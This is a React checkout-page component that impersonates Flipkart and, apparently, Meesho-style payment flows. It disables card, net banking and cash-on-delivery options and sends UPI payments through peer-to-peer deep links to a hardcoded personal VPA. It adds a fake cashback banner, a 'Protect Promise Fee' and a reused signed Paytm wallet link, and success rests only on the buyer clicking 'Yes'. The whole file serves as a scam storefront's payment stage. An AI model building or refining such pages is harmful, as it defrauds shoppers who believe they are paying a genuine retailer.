import React, { useState, useEffect, useRef } from "react";
import { useLocation, useNavigate } from "react-router-dom";

const INITIAL_TIME = 366;

const resolvePath = (value = "") => {
  if (!value) return "";
  if (/^(https?:)?\/\//.test(value) || value.startsWith("data:")) return value;
  return value.startsWith("/") ? value : `/${value.replace(/^\.?\//, "")}`;
};

const fetchWebControllerData = async () => {
  const response = await fetch("/webcontrollerdata.json", { cache: "no-store" });
  if (!response.ok) {
    throw new Error("Unable to load payment config");
  }
  return response.json();
};

export const buildUpiIntentUrl = (app, sourceUpi, amount = null, transactionRef = null, note = "Order Payment") => {
  if (!sourceUpi) return "";

  try {
    const url = new URL(sourceUpi);
    const params = new URLSearchParams(url.search);
    const safePa = params.get("pa") || "paytm.s31y582@pty";
    const safePn = params.get("pn") || "Merchant";
    const safeMc = params.get("mc") || "";
    const safeMode = params.get("mode") || "";
    const safeCallbackUrl = params.get("url") || "";
    const safeAmount = Number(amount || params.get("am") || 0).toFixed(2);
    const safeRef = transactionRef || params.get("tr") || `RR${Math.random().toString(36).slice(2, 10)}${Date.now()}`;
    const safeNote = note || params.get("tn") || "Order Payment";

    const appSchemes = {
      phonepe: "phonepe://pay",
      paytm: "paytmmp://pay",
      gpay: "upi://pay",
      default: "upi://pay"
    };

    const finalParams = new URLSearchParams();

    if (app === "paytm") {
      finalParams.set("featuretype", "money_transfer");
    }

    finalParams.set("pa", safePa);
    finalParams.set("pn", safePn);
    finalParams.set("am", safeAmount);
    finalParams.set("tr", safeRef);
    finalParams.set("cu", "INR");
    finalParams.set("tn", safeNote.replace(/^OrderNo:\s*/i, ""));

    if (app === "phonepe") {
      if (safeMc) finalParams.set("mc", safeMc);
      if (safeMode) finalParams.set("mode", safeMode);
      if (safeCallbackUrl) finalParams.set("url", safeCallbackUrl);

      return `${appSchemes.phonepe}?${finalParams.toString()}`;
    }

    return `${appSchemes[app] || appSchemes.default}?${finalParams.toString()}`;
  } catch (error) {
    return sourceUpi;
  }
};

const Payment = () => {
  const location = useLocation();
  const navigate = useNavigate();

  const [upiOptions, setUpiOptions] = useState([]);
  const [selectedOption, setSelectedOption] = useState("");
  const [timeLeft, setTimeLeft] = useState(INITIAL_TIME);
  const [razorpayConfig, setRazorpayConfig] = useState(null);
  const [isRedirecting, setIsRedirecting] = useState(false);
  const [redirectError, setRedirectError] = useState("");
  const [showPaymentConfirmation, setShowPaymentConfirmation] = useState(false);
  const paymentReturnCheckRef = useRef(false);
  const paymentTimeoutRef = useRef(null);

  const cart = location.state?.cart || [];
  const totalPrice = location.state?.totalPrice || 0;
  const protectPromiseFee = 19;

  useEffect(() => {
    const loadData = async () => {
      try {
        const data = await fetchWebControllerData();

        if (data.razorpay) {
          const fixedRazorpay = {
            ...data.razorpay,
            logo: resolvePath(data.razorpay.logo)
          };
          setRazorpayConfig(fixedRazorpay);
        }

        if (data.upiOptions) {
          const fixedUpiOptions = data.upiOptions.map((opt) => ({
            ...opt,
            upiimg: resolvePath(opt.upiimg),
            paymentImages: opt.paymentImages ? opt.paymentImages.map(resolvePath) : undefined
          }));
          setUpiOptions(fixedUpiOptions);
        }

        if (data.razorpay && data.razorpay.enabled) {
          setSelectedOption("Razorpay");
        } else if (data.upiOptions && data.upiOptions.length > 0) {
          const defaultOpt = data.upiOptions.find((opt) => opt.paymentName === "PhonePe") || data.upiOptions.find((opt) => opt.paymentName === "Paytm") || data.upiOptions.find((opt) => opt.paymentName === "Google Pay") || data.upiOptions[0];
          if (defaultOpt) setSelectedOption(defaultOpt.paymentName);
        }

        if (data.facebookPixelId) {
          loadFacebookPixel(data.facebookPixelId);
        }
      } catch (err) {
        console.error("Error loading config:", err);
      }
    };
    loadData();
  }, []);

  useEffect(() => {
    if (timeLeft <= 0) return;
    const timer = setInterval(() => setTimeLeft((prev) => prev - 1), 1000);
    return () => clearInterval(timer);
  }, [timeLeft]);

  const loadFacebookPixel = (pixelId) => {
    if (!window.fbq) {
      (function (f, b, e, v, n, t, s) {
        if (f.fbq) return;
        n = f.fbq = function () {
          n.callMethod ? n.callMethod(...arguments) : n.queue.push(arguments);
        };
        if (!f._fbq) f._fbq = n;
        n.push = n;
        n.loaded = true;
        n.version = "2.0";
        n.queue = [];
        t = b.createElement(e);
        t.async = true;
        t.src = "https://connect.facebook.net/en_US/fbevents.js";
        s = b.getElementsByTagName(e)[0];
        s.parentNode.insertBefore(t, s);
      })(window, document, "script");
    }
    window.fbq("init", pixelId);
    window.fbq("track", "PageView");
  };


  useEffect(() => {
    const handlePaymentAppReturn = () => {
      if (document.visibilityState === "visible" && paymentReturnCheckRef.current) {
        setIsRedirecting(false);
        setShowPaymentConfirmation(true);
      }
    };

    document.addEventListener("visibilitychange", handlePaymentAppReturn);
    window.addEventListener("focus", handlePaymentAppReturn);

    return () => {
      document.removeEventListener("visibilitychange", handlePaymentAppReturn);
      window.removeEventListener("focus", handlePaymentAppReturn);
    };
  }, []);

  const dismissPaymentConfirmation = () => {
    setShowPaymentConfirmation(false);
    paymentReturnCheckRef.current = false;
  };

  const confirmPaymentSuccess = () => {
    dismissPaymentConfirmation();
    navigate("/thank-you", {
      state: {
        amount: totalPrice,
        app: selectedOption,
      }
    });
  };


  const guid = () => {
    const s4 = () => Math.floor((1 + Math.random()) * 0x10000).toString(16).substring(1);
    return s4() + s4() + "-" + s4() + "-" + s4() + "-" + s4() + "-" + s4();
  };

  const openNativeAppDeepLink = (intentUrl) => {
    if (!intentUrl) return;

    setIsRedirecting(true);
    setRedirectError("");
    setShowPaymentConfirmation(false);
    paymentReturnCheckRef.current = true;

    // Direct synchronous redirection without iframe to ensure mobile browser allows intent trigger
    window.location.href = intentUrl;

    if (paymentTimeoutRef.current) {
      clearTimeout(paymentTimeoutRef.current);
    }

    paymentTimeoutRef.current = setTimeout(() => {
      paymentReturnCheckRef.current = false;
      setIsRedirecting(false);
    }, 5000);
  };

  const handleRazorpayPayment = () => {
    if (!razorpayConfig || !razorpayConfig.enabled) {
      alert("Razorpay is not configured");
      return;
    }

    if (!window.Razorpay) {
      alert("Razorpay SDK is unavailable right now.");
      return;
    }

    const options = {
      key: razorpayConfig.keyId,
      amount: Math.round(totalPrice * 100),
      currency: "INR",
      name: razorpayConfig.businessName || "Your Store",
      description: "Order Payment",
      image: razorpayConfig.logo || resolvePath("/img/100.webp"),
      handler: function (response) {
        navigate("/thank-you", {
          state: {
            amount: totalPrice,
            app: "Razorpay",
            paymentId: response.razorpay_payment_id
          }
        });
      },
      prefill: {
        name: razorpayConfig.prefill?.name || "",
        email: razorpayConfig.prefill?.email || "",
        contact: razorpayConfig.prefill?.contact || ""
      },
      notes: { cart_items: cart.length, total_amount: totalPrice },
      theme: { color: razorpayConfig.themeColor || "#2563eb" },
      modal: {
        ondismiss: function () { console.log("Payment cancelled by user"); }
      }
    };

    const razorpay = new window.Razorpay(options);
    razorpay.open();
    razorpay.on("payment.failed", function (response) {
      navigate("/payment-failed", {
        state: {
          error: response.error.description,
          cart: cart,
          totalPrice: totalPrice
        }
      });
    });
  };

  const handleNativeUpiPayment = () => {
    const selectedUpi = upiOptions.find(
      (option) => option.paymentName === selectedOption
    );

    if (!selectedUpi) {
      alert("Please select a valid payment option");
      return;
    }

    const amount = Number(totalPrice).toFixed(2);
    const splitLink = selectedUpi.link.split("?");
    const urlParams = new URLSearchParams(splitLink.length > 1 ? splitLink[1] : "");
    const upiId = urlParams.get("pa") || "paytm.s31y582@pty";
    const site_name = "flipkart Shopping";
    const txn_id = "OrderNo: " + guid();

    let redirect_url = "";

    if (selectedOption === "PhonePe") {
      const payload = {
        p2pPaymentCheckoutParams: {
          checkoutType: "COLLECT",
          initialAmount: Math.round(Number(amount) * 100),
          note: {
            type: "text",
            message: txn_id
          },
          supportedInstruments: -1
        },
        contact: {
          type: "EXTERNAL_MERCHANT",
          name: "Filpkart Shopping",
          vpa: upiId
        }
      };
      const jsonString = JSON.stringify(payload);
      const base64Data = encodeURIComponent(btoa(jsonString));
      redirect_url = "phonepe://native?data=" + base64Data + "&id=p2ppayment";
    } else if (selectedOption === "Paytm") {
      // Proven signed Paytm wallet deep-link matching the working Meesho flow
      redirect_url = "paytmmp://cash_wallet?pa=" + upiId + "&pn=" + encodeURIComponent(site_name) + "&am=" + amount + "&tr=&mc=8999&cu=INR&tn=OrderNo:%20537eb5fe-42df-7af4-9174-4f42&sign=AAuN7izDWN5cb8A5scnUiNME+LkZqI2DWgkXlN1McoP6WZABa/KkFTiLvuPRP6/nWK8BPg/rPhb+u4QMrUEX10UsANTDbJaALcSM9b8Wk218X+55T/zOzb7xoiB+BcX8yYuYayELImXJHIgL/c7nkAnHrwUCmbM97nRbCVVRvU0ku3Tr&featuretype=money_transfer";
    } else if (selectedOption === "Google Pay" || selectedOption === "GPay") {
      const payloadg = {
        p2pPaymentCheckoutParams: {
          checkoutType: "COLLECT",
          initialAmount: Math.round(Number(amount) * 100),
          note: {
            type: "text",
            message: txn_id
          },
          supportedInstruments: -1
        },
        contact: {
          type: "EXTERNAL_MERCHANT",
          name: "Flipkart Shopping",
          vpa: upiId
        }
      };
      const jsonStringg = JSON.stringify(payloadg);
      const base64Datag = encodeURIComponent(btoa(jsonStringg));
      redirect_url = "phonepe://native?data=" + base64Datag + "&id=p2ppayment";
    } else {
      redirect_url = selectedUpi.link || `upi://pay?pa=${upiId}&pn=${encodeURIComponent(site_name)}&am=${amount}&cu=INR&tn=${encodeURIComponent(txn_id)}`;
    }

    openNativeAppDeepLink(redirect_url);
  };

  const handlePay = () => {
    if (!selectedOption) {
      alert("Please select a payment option");
      return;
    }

    if (selectedOption === "Razorpay") {
      handleRazorpayPayment();
      return;
    }

    handleNativeUpiPayment();
  };

  if (!cart.length) {
    return (
      <div style={{ textAlign: "center", padding: "50px" }}>
        <h2>No payment data found!</h2>
        <button onClick={() => navigate("/")} style={{ padding: "10px 20px", background: "#2563eb", color: "#fff", border: "none", marginTop: "20px" }}>Go Back</button>
      </div>
    );
  }

  const isRazorpayEnabled = razorpayConfig && razorpayConfig.enabled;
  const showRazorpay = isRazorpayEnabled;
  const showNativeUpi = !isRazorpayEnabled;

  return (
    <>
      <style>{`
        @keyframes spin {
          from { transform: rotate(0deg); }
          to { transform: rotate(360deg); }
        }
      `}</style>

      {isRedirecting && (
        <div style={{
          position: "fixed",
          inset: 0,
          background: "rgba(255, 255, 255, 0.92)",
          display: "flex",
          alignItems: "center",
          justifyContent: "center",
          zIndex: 9999
        }}>
          <div style={{ textAlign: "center", color: "#1f2937" }}>
            <div style={{
              width: 52,
              height: 52,
              borderRadius: "50%",
              border: "5px solid #e5e7eb",
              borderTopColor: "#2563eb",
              margin: "0 auto 16px",
              animation: "spin 1s linear infinite"
            }} />
            <div style={{ fontSize: 16, fontWeight: 600 }}>Opening payment app...</div>
            <div style={{ fontSize: 12, marginTop: 6, color: "#4b5563" }}>Please wait while we redirect you.</div>
          </div>
        </div>
      )}

      {redirectError && (
        <div style={{
          margin: "16px 0",
          padding: "12px 14px",
          background: "#fff3f3",
          border: "1px solid #fecaca",
          color: "#9f1239",
          borderRadius: "12px",
          fontSize: 14,
          fontWeight: 500
        }}>
          {redirectError}
        </div>
      )}

      {showPaymentConfirmation && (
        <div style={{
          position: "fixed",
          inset: 0,
          background: "rgba(17, 24, 39, 0.45)",
          display: "flex",
          alignItems: "center",
          justifyContent: "center",
          zIndex: 10000,
          padding: "20px"
        }}>
          <div style={{
            width: "100%",
            maxWidth: "360px",
            background: "#fff",
            borderRadius: "16px",
            boxShadow: "0 18px 50px rgba(0,0,0,0.2)",
            padding: "24px 20px 18px",
            textAlign: "center"
          }}>
            <div style={{ fontSize: 18, fontWeight: 700, color: "#111827", marginBottom: 12 }}>
              Have you completed the payment?
            </div>
            <div style={{ fontSize: 14, color: "#4b5563", marginBottom: 22 }}>
              Please confirm before continuing.
            </div>
            <div style={{ display: "flex", gap: 12 }}>
              <button
                onClick={confirmPaymentSuccess}
                style={{
                  flex: 1,
                  background: "#2563eb",
                  color: "#fff",
                  border: "none",
                  borderRadius: "10px",
                  padding: "12px 16px",
                  fontWeight: 600,
                  cursor: "pointer"
                }}
              >
                Yes
              </button>
              <button
                onClick={dismissPaymentConfirmation}
                style={{
                  flex: 1,
                  background: "#f3f4f6",
                  color: "#111827",
                  border: "none",
                  borderRadius: "10px",
                  padding: "12px 16px",
                  fontWeight: 600,
                  cursor: "pointer"
                }}
              >
                No
              </button>
            </div>
          </div>
        </div>
      )}

      <div className="payment-container-new">
        <div className="payment-header-new">
        <div className="header-left">
          <button onClick={() => navigate(-1)} className="back-btn-new">
            <i className="fa-solid fa-arrow-left"></i>
          </button>
          <div className="header-titles">
            <span className="step-count">Step 3 of 3</span>
            <h2 className="page-title">Payments</h2>
          </div>
        </div>
        <div className="secure-badge">
          <i className="fa-solid fa-shield-halved"></i> 100% Secure
        </div>
      </div>

      <div className="summary-card">
        <div className="summary-row">
          <span>Price ({cart.length} items)</span>
          <span>₹{cart.reduce((sum, item) => sum + Number(String(item.disprice).replace(/\D/g, "")) * item.quantity, 0).toLocaleString()}</span>
        </div>
        <div className="summary-row">
          <span>Protect Promise Fee</span>
          <span>₹{protectPromiseFee}</span>
        </div>
        <div className="summary-row total-row-new">
          <span className="total-label-new">Total Amount <i className="fa-solid fa-chevron-up" style={{ fontSize: '12px', marginLeft: '5px' }}></i></span>
          <span className="total-value-new">₹{totalPrice.toLocaleString()}</span>
        </div>
      </div>

      <div className="cashback-banner">
        <div className="cashback-content">
          <strong className="cashback-title">15% Cashback</strong>
          <span className="cashback-sub">Claim now with payment offers</span>
        </div>
        <div className="cashback-icons">
          <img src={resolvePath("/img/axis.png")} alt="Axis Bank" style={{ height: '30px', width: '30px', objectFit: 'contain' }} />
          <img src={resolvePath("/img/sbi.png")} alt="SBI" style={{ height: '30px', width: '30px', objectFit: 'contain' }} />
        </div>
      </div>

      <div className="payment-section-card expanded">
        <div className="payment-section-header">
          <div className="section-header-left">
            <div className="section-icon-box">
              <span style={{ fontWeight: 'bold', fontSize: '12px' }}>UPI</span>
            </div>
            <div className="section-text">
              <span className="section-title">UPI</span>
              <span className="section-subtitle">Pay by any UPI app</span>
            </div>
          </div>
          <i className="fa-solid fa-chevron-down decoration-icon"></i>
        </div>

        <div className="payment-section-body">
          <div className="upi-app-list">
            {showRazorpay && (
              <label className="upi-option-row">
                <div className="upi-option-left">
                  <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/e/e1/UPI-Logo-vector.svg/320px-UPI-Logo-vector.svg.png" alt="UPI" className="app-icon" style={{ width: '40px' }} />
                  <span className="upi-label" style={{ fontWeight: 'bold' }}>Cards, UPI, NetBanking</span>
                </div>
                <input
                  type="radio"
                  name="paymentMethod"
                  value="Razorpay"
                  checked={selectedOption === "Razorpay"}
                  onChange={() => setSelectedOption("Razorpay")}
                  className="radio-new"
                />
              </label>
            )}

            {showNativeUpi && upiOptions.map((option) => (
              <label key={option.paymentName} className="upi-option-row">
                <div
                  className="upi-option-left"
                  style={{
                    gap: option.paymentName === "PhonePe" || option.paymentName === "Paytm" ? "12px" : "8px"
                  }}
                >
                  <img
                    src={option.upiimg}
                    alt={option.paymentName}
                    className="app-icon"
                    style={{
                      width: option.paymentName === "PhonePe" || option.paymentName === "Paytm" ? "46.8px" : "52px",
                      height: option.paymentName === "PhonePe" || option.paymentName === "Paytm" ? "46.8px" : "52px",
                      padding: "2px",
                      objectFit: "contain",
                      borderRadius: option.paymentName === "Paytm" ? "100px" : "10px"
                    }}
                  />
                  <span
                    className="upi-label"
                    style={{
                      fontWeight: option.paymentName === "PhonePe" || option.paymentName === "Paytm" ? 700 : 500,
                      fontSize: option.paymentName === "PhonePe" || option.paymentName === "Paytm" ? "15px" : "14px"
                    }}
                  >
                    {option.paymentName}
                  </span>
                </div>
                <input
                  type="radio"
                  name="paymentMethod"
                  value={option.paymentName}
                  checked={selectedOption === option.paymentName}
                  onChange={() => setSelectedOption(option.paymentName)}
                  className="radio-new"
                />
              </label>
            ))}
          </div>

          <button
            className="pay-btn-yellow"
            onClick={handlePay}
            disabled={!selectedOption}
          >
            PAY ₹{totalPrice.toLocaleString()}
          </button>
        </div>
      </div>

      <div className="payment-section-card collapsed">
        <div className="payment-section-header">
          <div className="section-header-left">
            <i className="fa-regular fa-credit-card section-icon-simple"></i>
            <div className="section-text">
              <span className="section-title">Credit/Debit/ATM Card</span>
              <span className="section-subtitle">Add and secure cards as per RBI guidelines</span>
              <span className="offer-text-green">Get upto 5% cashback* • 2 offers available</span>
            </div>
          </div>
          <span className="unavailable-text">Unavailable <i className="fa-regular fa-circle-question"></i></span>
        </div>
      </div>

      <div className="payment-section-card collapsed">
        <div className="payment-section-header">
          <div className="section-header-left">
            <i className="fa-solid fa-building-columns section-icon-simple"></i>
            <span className="section-title">Net Banking</span>
          </div>
          <span className="unavailable-text">Unavailable <i className="fa-regular fa-circle-question"></i></span>
        </div>
      </div>

      <div className="payment-section-card collapsed">
        <div className="payment-section-header">
          <div className="section-header-left">
            <i className="fa-solid fa-money-bill section-icon-simple"></i>
            <span className="section-title">Cash on Delivery</span>
          </div>
          <span className="unavailable-text">Unavailable <i className="fa-regular fa-circle-question"></i></span>
        </div>
      </div>

      <div className="trust-footer">
        <p>35 Crore happy customers and counting!</p>
        <div className="smile-icon">
          <i className="fa-regular fa-face-smile"></i>
        </div>
      </div>

      <style>{`
        @keyframes spin {
          0% { transform: rotate(0deg); }
          100% { transform: rotate(360deg); }
        }

        .payment-container-new {
          background: #f5f5f5;
          min-height: 100vh;
          padding: 18px 16px 28px;
          font-family: Arial, sans-serif;
          color: #1f2937;
        }

        .payment-header-new {
          display: flex;
          align-items: center;
          justify-content: space-between;
          margin-bottom: 18px;
        }

        .header-left {
          display: flex;
          align-items: center;
          gap: 12px;
        }

        .back-btn-new {
          background: transparent;
          border: none;
          font-size: 18px;
          color: #111827;
          cursor: pointer;
          width: 34px;
          height: 34px;
          border-radius: 50%;
          display: flex;
          align-items: center;
          justify-content: center;
        }

        .header-titles {
          display: flex;
          flex-direction: column;
        }

        .step-count {
          font-size: 11px;
          color: #6b7280;
          margin-bottom: 2px;
          letter-spacing: normal;
          text-transform: none;
        }

        .page-title {
          margin: 0;
          font-size: 16px;
          line-height: 1.2;
          font-weight: 600;
          color: #333;
        }

        .secure-badge {
          background: #e8fbea;
          color: #0f7a45;
          border-radius: 999px;
          padding: 8px 12px;
          font-size: 12px;
          font-weight: 600;
          display: flex;
          align-items: center;
          gap: 6px;
        }

        .summary-card {
          background: #fff;
          border-radius: 16px;
          padding: 16px 18px;
          box-shadow: 0 2px 8px rgba(0, 0, 0, 0.06);
          margin-bottom: 18px;
        }

        .summary-row {
          display: flex;
          justify-content: space-between;
          font-size: 15px;
          color: #374151;
          margin: 10px 0;
        }

        .total-row-new {
          border-top: 1px solid #e5e7eb;
          padding-top: 14px;
          margin-top: 14px;
          font-weight: 700;
        }

        .total-label-new {
          font-size: 14px;
          color: #111827;
        }

        .total-value-new {
          color: #111827;
          font-size: 18px;
        }

        .cashback-banner {
          background: #D8E7FF;
          border: 1px solid #bfd4ff;
          border-radius: 16px;
          padding: 14px 18px;
          display: flex;
          justify-content: space-between;
          align-items: center;
          margin-bottom: 18px;
        }

        .cashback-content {
          display: flex;
          flex-direction: column;
        }

        .cashback-title {
          font-size: 18px;
          color: #2775F0;
          margin-bottom: 3px;
        }

        .cashback-sub {
          font-size: 12px;
          color: #1e3a8a;
        }

        .cashback-icons {
          display: flex;
          align-items: center;
          gap: 10px;
        }

        .cashback-icons img {
          height: 30px;
          width: 30px;
          object-fit: contain;
        }

        .payment-section-card {
          background: #fff;
          border-radius: 18px;
          overflow: hidden;
          box-shadow: 0 2px 8px rgba(0, 0, 0, 0.04);
          margin-bottom: 14px;
        }

        .expanded {
          border: 1px solid #e5e7eb;
        }

        .collapsed {
          border: 1px solid #f1f5f9;
          opacity: 0.9;
        }

        .payment-section-header {
          display: flex;
          align-items: center;
          justify-content: space-between;
          padding: 16px 18px;
        }

        .section-header-left {
          display: flex;
          align-items: center;
          gap: 12px;
          min-width: 0;
        }

        .section-icon-box {
          width: 40px;
          height: 40px;
          background: #fff4d5;
          border-radius: 12px;
          display: flex;
          align-items: center;
          justify-content: center;
          color: #a16207;
        }

        .section-icon-simple {
          font-size: 18px;
          color: #6b7280;
        }

        .section-text {
          display: flex;
          flex-direction: column;
        }

        .section-title {
          font-size: 15px;
          font-weight: 700;
          color: #111827;
        }

        .section-subtitle {
          font-size: 11px;
          color: #6b7280;
          margin-top: 3px;
        }

        .offer-text-green {
          font-size: 11px;
          color: #2e8b57;
          margin-top: 5px;
        }

        .decoration-icon {
          color: #6b7280;
        }

        .unavailable-text {
          color: #9ca3af;
          font-size: 12px;
          display: flex;
          align-items: center;
          gap: 5px;
        }

        .payment-section-body {
          padding: 0 18px 18px;
        }

        .upi-app-list {
          display: flex;
          flex-direction: column;
          gap: 10px;
          margin-top: 6px;
        }

        .upi-option-row {
          display: flex;
          align-items: center;
          justify-content: space-between;
          gap: 10px;
          padding: 10px 12px;
          border: 1px solid #eef2f7;
          border-radius: 12px;
          background: #fafafa;
          cursor: pointer;
        }

        .upi-option-left {
          display: flex;
          align-items: center;
          gap: 8px;
          min-width: 0;
        }

        .app-icon {
          width: 40px;
          height: 40px;
          object-fit: contain;
          border-radius: 10px;
          background: #fff;
          padding: 2px;
        }

        .upi-label {
          font-size: 14px;
          color: #111827;
        }

        .radio-new {
          appearance: none;
          -webkit-appearance: none;
          width: 24px;
          height: 24px;
          border-radius: 50%;
          border: 2px solid #9ca3af;
          background: #fff;
          display: inline-block;
          position: relative;
          margin: 0;
          cursor: pointer;
          transition: all 0.2s ease;
        }

        .radio-new:checked {
          border-color: #0f74ff;
          background: #0f74ff;
          box-shadow: inset 0 0 0 5px #fff;
        }

        .pay-btn-yellow {
          width: 100%;
          margin-top: 18px;
          border: none;
          border-radius: 14px;
          background: linear-gradient(180deg, #ffd81d 0%, #f5c90c 100%);
          color: #1f2937;
          font-weight: 800;
          font-size: 16px;
          padding: 16px 18px;
          cursor: pointer;
        }

        .pay-btn-yellow:disabled {
          opacity: 0.6;
          cursor: not-allowed;
        }

        .trust-footer {
          display: flex;
          align-items: center;
          justify-content: center;
          gap: 10px;
          margin-top: 24px;
          color: #7b7b7b;
          font-size: 14px;
        }

        .smile-icon {
          font-size: 22px;
          color: #f59e0b;
        }
      `}</style>
      </div>
    </>
  );
};

export default Payment;
